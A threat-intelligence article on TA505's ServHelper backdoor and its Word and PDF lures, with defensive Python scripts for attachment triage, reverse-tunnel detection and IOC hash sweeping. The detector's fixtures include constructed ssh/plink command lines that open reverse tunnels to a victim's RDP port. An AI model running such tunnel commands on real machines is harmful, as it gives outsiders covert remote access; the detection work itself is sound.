Tuesday, November 12, 2024

TA505 Hacking Group Launching New Malware ServHelper via Weaponized MS Word Documents


The TA505 threat actors are currently running a new malware campaign that delivers a backdoor, ServHelper, through weaponized MS Word documents and mainly targets financial institutions.

The TA505 hacking group already has a record of running some of the largest malicious email campaigns observed, distributing the Dridex banking trojan and the Locky ransomware, which affected millions of computers around the world.

The ServHelper backdoor was observed in 2018 in two distinct variants with two different functions: one focused on remote desktop access (the "tunnel" variant) and one that acts as a downloader.


The downloader variant retrieves a newer malware family called FlawedGrace, a full-featured remote access trojan (RAT) that was first observed in November 2017.

The TA505 hacking group targets a range of institutions and organizations, including banks, retail businesses, and restaurants.

Backdoor Infection process

ServHelper is initially distributed by email, attached as a weaponized Microsoft Word document or another attachment posing as legitimate content.

A November 2018 campaign used attachments in Microsoft ".doc", ".pub", or ".wiz" format carrying a macro, with the lure pressuring the user to enable it; once macros are enabled, the infection chain starts.

A later November 2018 campaign mixed Microsoft Word attachments carrying malicious macros with PDF attachments whose URLs led to a fake "Adobe PDF Plugin" web page that served the malware.

Once the victim enables the macro or follows the link, the downloader variant of ServHelper contacts its C&C server and retrieves the FlawedGrace remote access trojan (RAT).
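The two lure types described above (macro-carrying .doc/.pub/.wiz documents and PDFs whose link points at a plugin page) can be triaged before a user ever opens them. The script below is an added example written for this article, not code from the original page or from Proofpoint; it classifies an attachment by its leading bytes rather than its extension, looks for a VBA project (the UTF-16LE `_VBA_PROJECT` stream name in OLE2 files, the `vbaProject.bin` part in OOXML zips), pulls `/URI (...)` link targets out of PDFs, and flags an extension that lies about its container. The sample attachments, the `lure.invalid` URL and the `EXPECTED_CONTAINER` table are constructed for the demo and are assumptions, not artifacts of the campaign.

```python
import io
import os
import re
import zipfile

# Container magic numbers. Legacy .doc/.pub/.wiz files are OLE2 (CFB)
# containers, .docx/.docm are OOXML zip containers, and PDF lures start
# with %PDF.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"
PDF_MAGIC = b"%PDF"

# OLE2 stores stream names as UTF-16LE. Every VBA project contains a stream
# named _VBA_PROJECT, so its encoded name is a cheap, reliable macro marker.
OLE_VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")

# Extensions used by the November 2018 lures and the container each one
# should legitimately have (assumption for this example). A ".doc" that is
# really an OOXML zip (a renamed .docm) still opens in Word, so flag it.
EXPECTED_CONTAINER = {".doc": "ole2", ".pub": "ole2", ".wiz": "ole2",
                      ".docm": "ooxml", ".docx": "ooxml", ".pdf": "pdf"}

# A PDF link action carries its target as /URI (...); this is how a
# "download the plugin" lure gets the user to the malware page.
PDF_URI_RE = re.compile(rb"/URI\s*\(([^)]*)\)")


def detect_container(data):
    """Classify the attachment by its leading bytes, not its extension."""
    if data.startswith(OLE_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml"
    if data.startswith(PDF_MAGIC):
        return "pdf"
    return "unknown"


def ooxml_has_vba(data):
    """True if the OOXML zip carries a vbaProject.bin part (macro-enabled)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage(filename, data):
    """Return a verdict for one attachment: container, macros, URLs, mismatch."""
    ext = os.path.splitext(filename)[1].lower()
    container = detect_container(data)
    verdict = {"file": filename, "container": container, "has_macros": False,
               "urls": [], "ext_mismatch": False, "suspicious": False}
    if container == "ole2":
        verdict["has_macros"] = OLE_VBA_MARKER in data
    elif container == "ooxml":
        verdict["has_macros"] = ooxml_has_vba(data)
    elif container == "pdf":
        verdict["urls"] = [u.decode("latin-1") for u in PDF_URI_RE.findall(data)]
    expected = EXPECTED_CONTAINER.get(ext)
    verdict["ext_mismatch"] = expected is not None and expected != container
    verdict["suspicious"] = bool(verdict["has_macros"] or verdict["urls"]
                                 or verdict["ext_mismatch"])
    return verdict


def build_samples():
    """Constructed stand-ins for the lure types; none of this is real malware."""
    # Minimal OLE2 look-alike: the header magic plus a UTF-16LE VBA stream name.
    fake_doc = OLE_MAGIC + b"\x00" * 504 + OLE_VBA_MARKER + b"\x00" * 64
    # A macro-enabled OOXML container (a .docm) delivered under a .doc name.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    fake_docm_as_doc = buf.getvalue()
    # A PDF whose link action points at a constructed plugin-lure URL.
    fake_pdf = (b"%PDF-1.4\n1 0 obj << /Type /Annot /Subtype /Link "
                b"/A << /S /URI /URI (http://lure.invalid/adobe-pdf-plugin) >> >> endobj\n")
    clean_pdf = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n"
    return {"invoice.doc": fake_doc, "report.doc": fake_docm_as_doc,
            "statement.pdf": fake_pdf, "receipt.pdf": clean_pdf}


def triage_all(samples):
    return {name: triage(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, v in triage_all(build_samples()).items():
        print(name, "SUSPICIOUS" if v["suspicious"] else "ok", v)
```

The OLE2 check is a byte-string heuristic, not a CFB directory parse, so it can in principle be fooled by a document that merely contains the UTF-16 text "_VBA_PROJECT"; for production triage, run a proper OLE parser such as oletools' olevba and treat this as a first-pass filter on the mail gateway.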

According to Proofpoint research, there are two distinct variants of ServHelper: a “tunnel” variant and a “downloader” variant. The “tunnel” variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). 

Once the tunnel gives the attacker remote access to the infected machine, the attacker can hijack legitimate user accounts or their web browser profiles.
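A reverse SSH tunnel that exposes RDP is visible on the endpoint as an SSH client invoked with a `-R` remote forward whose target port is 3389. The detection below is an added example written for this article, not code from the original page or from Proofpoint; it parses ssh/plink style command lines, extracts each `-R` spec, and flags the ones that terminate on the RDP port. The article does not name the client binary ServHelper uses, so the `SSH_CLIENTS` set and every command line in `SAMPLE_CMDLINES` are constructed assumptions for the demo (addresses are from the RFC 5737 documentation ranges).

```python
import re
import shlex

RDP_PORT = 3389
# SSH clients an implant could drop or reuse to build the tunnel. Assumption:
# the article does not say which binary ServHelper uses.
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}


def _basename(token):
    return re.split(r"[\\/]", token.strip('"'))[-1].lower()


def parse_remote_forwards(cmdline):
    """Return every -R forward spec on an ssh/plink style command line."""
    # posix=False keeps Windows backslashes intact; strip the quotes ourselves.
    argv = [t.strip('"') for t in shlex.split(cmdline, posix=False)]
    if not argv or _basename(argv[0]) not in SSH_CLIENTS:
        return []
    forwards = []
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg == "-R" and i + 1 < len(argv):
            forwards.append(argv[i + 1])
            i += 2
            continue
        if arg.startswith("-R") and len(arg) > 2:   # attached form: -R2222:...
            forwards.append(arg[2:])
        i += 1
    return forwards


def parse_forward_spec(spec):
    """Split [bind_address:]port:host:hostport into (bind, host, hostport).
    Known limitation: IPv6 bracket syntax is not handled."""
    parts = spec.rsplit(":", 2)
    if len(parts) != 3 or not parts[2].isdigit():
        return None
    return parts[0], parts[1], int(parts[2])


def find_rdp_tunnels(cmdlines):
    """Flag command lines whose reverse tunnel terminates on the RDP port."""
    hits = []
    for line in cmdlines:
        argv = [t.strip('"') for t in shlex.split(line, posix=False)]
        for spec in parse_remote_forwards(line):
            parsed = parse_forward_spec(spec)
            if parsed and parsed[2] == RDP_PORT:
                # The attacker-side endpoint is the user@host argument.
                remote = next((a for a in reversed(argv[1:]) if "@" in a), argv[-1])
                hits.append({"cmdline": line, "forward": spec,
                             "target_port": parsed[2], "remote": remote})
    return hits


# Constructed process command lines for the demo; the first two imitate the
# tunnel behaviour, the rest are ordinary administrative use.
SAMPLE_CMDLINES = [
    r"C:\ProgramData\ssh.exe -N -R 12345:127.0.0.1:3389 tunnel@198.51.100.7",
    r'"C:\Program Files\PuTTY\plink.exe" -N -R 0.0.0.0:2222:localhost:3389 -pw hunter2 user@203.0.113.9',
    "ssh -L 8080:intranet:80 dev@bastion.corp.example",
    "ssh -R 5000:localhost:5000 dev@bastion.corp.example",
    r"notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for hit in find_rdp_tunnels(SAMPLE_CMDLINES):
        print("reverse tunnel to RDP:", hit["forward"], "->", hit["remote"])
```

Feed it the command lines from Sysmon event 1 or EDR process-creation telemetry. A `-R` forward that is not to 3389 (the fourth sample) is still worth a lower-severity alert on workstations, where legitimate reverse tunnels are rare; and a renamed client binary will evade the `SSH_CLIENTS` check, so pair this with a hash or signer check on the process image.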

Both variants use an HTTP-based C&C protocol over port 443 (the HTTPS port) and, less frequently, port 80 (HTTP). Because that traffic blends in with ordinary web browsing, port-based egress filtering alone will not stop it; detection has to rely on the indicators below or on host behaviour such as the reverse tunnels described above.

Indicators of Compromise (IOCs)

SHA-256

52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c – November 9 "Tunnel" campaign ServHelper

eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4 – November 15 "Downloader" campaign attachment

f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac – December 13 "FlawedGrace" campaign attachment
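The three hashes above can be swept across mailbox exports, download folders or a file share directly. The script below is an added example written for this article, not code from the original page; it carries the article's SHA-256 indicators, hashes files in 1 MiB chunks so large attachments do not sit in memory, and walks a directory tree reporting every match. The `demo()` function plants a constructed, harmless file whose digest is added to a copy of the IOC set so the sweep can be exercised offline; that file, its content and the temporary directory layout are assumptions for the demo and are not campaign artifacts.

```python
import hashlib
import os
import tempfile

# SHA-256 indicators published with the article, keyed by digest.
SERVHELPER_IOCS = {
    "52c72a9de2f6e892f07827add85ad913b0541cd5c8449aadc2722f8eb75e548c":
        'November 9 "Tunnel" campaign ServHelper',
    "eb66ebb95a3dcecae64c61f611a9332fbf460d1b8039d3ab7e4f220104a4bec4":
        'November 15 "Downloader" campaign attachment',
    "f4b9219f329803dd45afd5646351de456e608dd946830c961ec66c6c25e52cac":
        'December 13 "FlawedGrace" campaign attachment',
}


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """Hash a file in 1 MiB chunks so large downloads do not sit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(root, iocs=SERVHELPER_IOCS):
    """Walk root and return (path, digest, label) for every IOC match."""
    matches = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digest = sha256_file(path)
            except OSError:      # unreadable or vanished file: skip, keep going
                continue
            if digest in iocs:
                matches.append((path, digest, iocs[digest]))
    return matches


def demo():
    """Self-contained run: two constructed files, one planted in the IOC set."""
    planted = b"constructed stand-in for a ServHelper sample, not real malware\n"
    iocs = dict(SERVHELPER_IOCS)
    iocs[sha256_bytes(planted)] = "constructed demo sample"
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Downloads"))
        with open(os.path.join(root, "Downloads", "invoice.doc"), "wb") as fh:
            fh.write(planted)
        with open(os.path.join(root, "readme.txt"), "wb") as fh:
            fh.write(b"benign\n")
        return sweep(root, iocs)


if __name__ == "__main__":
    for path, digest, label in demo():
        print("MATCH", path, digest[:12], label)
```

Hash indicators age quickly against an actor like TA505 that rebuilds its payloads per campaign, so treat a sweep like this as a retrospective check for the documented samples rather than as ongoing detection, and extend `SERVHELPER_IOCS` with hashes from your own sandbox runs.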


Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.
